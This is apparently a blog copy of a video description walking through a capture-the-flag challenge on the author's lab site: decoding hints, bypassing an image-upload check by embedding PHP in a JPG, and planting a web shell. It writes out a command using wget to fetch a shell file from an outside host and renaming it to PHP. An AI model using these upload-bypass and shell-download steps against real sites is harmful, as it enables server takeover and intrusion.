1st Capture The Flag CTF Challenge Solution- 2016 – SQLi Basic

Hi,
My Facebook Link: https://www.facebook.com/shaifullah01
Facebook Page: https://www.facebook.com/sqlibasic
My Blog: http://sqli-basic.blogspot.com/

**** all query I posted in videos description.
**** Please stay with me, subscribe, like & share my video if you are **** interested & get some knowledge.

My Facebook Link: https://www.facebook.com/shaifullah01

hello geek
what’s up ?
I think better 😀
I am black EyE from Bangladesh
At First take my Salam
😀

Today I wanna saw u Capture The Flag- CTF
Challenge Solution 😀
Let’s Go…
http://clginstitute.org/Rce/
This is my CTF LAB
WGZjWGp4WGZlWGL2WGZ1WGZlWGZ2WGZmWGZmWGZmWGZlWGL2
it’s a hint’s 😀
lets try to decrypt 😀
Try to Convert it ROT13

http://clginstitute.org/Rce//Rc3/lOl
Boobs
😛

Boobz 😛 :v
http://clginstitute.org//Rc3/lOl/bOObZZ
:p
😮 :’
let’s try with view-source 😀

Go To : %4d%48%67%79%4e%54%4d%79%4e%6a%59%79%4e%54%4d%32%4d%7a%4d%79%4e%54%4d%33%4d%7a%51%79%4e%54%4d%32%4d%7a%59%79%4e%54%4d%79%4e%6a%59%3d

:V
we find 😀

now our link is

http://clginstitute.org/Rce//ctf/

again 😀
Now our link is
http://clginstitute.org/Rce//ctf/index2.php
in.php is my shell link 😀
now we needed to upload shell 😀
here factor with getimagesize variable
this variable always check it’s image or not 😀
now let’s try to bypass with
1. exiftool
2. jhed tools
3. edjpgcom .exe 😀
he he
can’t open :p
both are same 😀
now u put your shell code here :v
now i will put my cmd script in behind jpg 😀
:v
😮
it’s also work with jpg 😮
let’s try with php extention 😀 :v
File is an image – image/jpeg.The file 00.php has been uploaded.

:v :v he he. we success to upload our script 😀

lets try to find it :/
😮 where ? try to go upload page again
let’s try to find upload directory 😀
file path: /up3/your file name Here

our script is working 😀
lets try 😀
now try to upload our shell script
😀
3X.txt
cmd=wget http://www.sintrajud.org.br/userfiles/3X.txt
it’s our command
now rename file 3X.txt to 3X.php
😀
we get our shell 😀
now just put our condation 😀
Capture your flage in main directory 😀
go 😀

thanks for watch my video
please subscribe us & also like my videos 😀

Greetzz to All Muslime Hacker’s
Allah Hafez
Take Care 😀

All are text I put in the Description 😀
Stay with me 😀

**** all query I posted in videos description.
**** Please stay with me, subscribe, like & share my video if you are **** interested & get some knowledge.

My Facebook Link: https://www.facebook.com/shaifullah01
My Blog: http://sqli-basic.blogspot.com/

%%%%%%%%% Knowledge Should be Free %%%%%%%%%

It’s an Online It Section
Please Subscribe us.




Leave a Reply

Your email address will not be published. Required fields are marked *

Name *
Email *
Website